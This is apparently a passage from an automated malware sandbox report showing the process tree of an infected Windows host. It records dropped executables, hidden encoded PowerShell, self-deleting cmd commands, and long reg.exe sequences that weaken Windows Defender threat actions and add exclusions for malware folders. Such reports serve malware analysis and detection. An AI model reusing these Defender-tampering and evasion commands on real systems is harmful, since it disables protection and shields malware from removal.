                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im 3g0IgBY60ub3CvBAsgc379yk.exe /f
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:5756
                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                    timeout /t 6
                                                                    7⤵
                                                                    • Delays execution with timeout.exe
                                                                    PID:4728
                                                              • C:\Users\Admin\Documents\r35TCn0GDtnXO3pfSPOnXYkS.exe
                                                                "C:\Users\Admin\Documents\r35TCn0GDtnXO3pfSPOnXYkS.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:1424
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\r35TCn0GDtnXO3pfSPOnXYkS.exe
                                                                  6⤵
                                                                    PID:3580
                                                                    • C:\Windows\system32\choice.exe
                                                                      choice /C Y /N /D Y /T 0
                                                                      7⤵
                                                                        PID:1672
                                                                  • C:\Users\Admin\Documents\A6zb10898hiGPr_Ur8kgu5Jl.exe
                                                                    "C:\Users\Admin\Documents\A6zb10898hiGPr_Ur8kgu5Jl.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Checks processor information in registry
                                                                    PID:1180
                                                                  • C:\Users\Admin\Documents\cH77YTGLBZylxXs05i9lqwCP.exe
                                                                    "C:\Users\Admin\Documents\cH77YTGLBZylxXs05i9lqwCP.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3940
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sotema_3.exe
                                                                3⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3808
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sotema_1.exe
                                                                3⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4652
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_1.exe
                                                                  sotema_1.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3700
                                                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                                    5⤵
                                                                    • Loads dropped DLL
                                                                    PID:4340
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 616
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:4468
                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC765532D\sotema_3.exe
                                                            sotema_3.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Modifies system certificate store
                                                            PID:2224
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 1032
                                                              2⤵
                                                              • Program crash
                                                              PID:5320
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4340 -ip 4340
                                                            1⤵
                                                              PID:3484
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2292 -ip 2292
                                                              1⤵
                                                                PID:1912
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 636 -ip 636
                                                                1⤵
                                                                  PID:2864
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1684 -ip 1684
                                                                  1⤵
                                                                    PID:4572
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5084 -ip 5084
                                                                    1⤵
                                                                      PID:2864
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2292 -ip 2292
                                                                      1⤵
                                                                        PID:752
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1684 -ip 1684
                                                                        1⤵
                                                                          PID:1820
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 636 -ip 636
                                                                          1⤵
                                                                            PID:3112
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5084 -ip 5084
                                                                            1⤵
                                                                              PID:6104
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2224 -ip 2224
                                                                              1⤵
                                                                                PID:5136
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5084 -ip 5084
                                                                                1⤵
                                                                                  PID:5180
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084
                                                                                  1⤵
                                                                                    PID:5336
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                    1⤵
                                                                                      PID:2148
                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        2⤵
                                                                                          PID:3772
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            3⤵
                                                                                              PID:3304
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5084 -ip 5084
                                                                                          1⤵
                                                                                            PID:3428
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5084 -ip 5084
                                                                                            1⤵
                                                                                              PID:1892
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 5084 -ip 5084
                                                                                              1⤵
                                                                                                PID:2168
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5084 -ip 5084
                                                                                                1⤵
                                                                                                  PID:4312
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5084 -ip 5084
                                                                                                  1⤵
                                                                                                    PID:5760
                                                                                                  • C:\Users\Admin\AppData\Roaming\ccsbiiu
                                                                                                    C:\Users\Admin\AppData\Roaming\ccsbiiu
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5144
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:4448
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:4132
                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                        1⤵
                                                                                                          PID:5588
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5364 -ip 5364
                                                                                                          1⤵
                                                                                                            PID:5308
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\UMyAYFP.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\UMyAYFP.exe j6 /site_id 525403 /S
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in System32 directory
                                                                                                            PID:5484
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:6116
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:4560
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                    4⤵
                                                                                                                      PID:2032
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:4800
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:5184
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4728
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:388
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:448
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:1896
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:4016
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:3864
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:3548
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5320
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5100
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:3928
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:3312
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:5192
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4060
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2244
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4460
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4312
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5948
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1416
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5400
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5368
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1564
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                2⤵
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:1512
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1992
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2692
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4196
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3736
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5724
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3992
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3784
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4556
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1908
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1048
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1500
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:2852
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3360
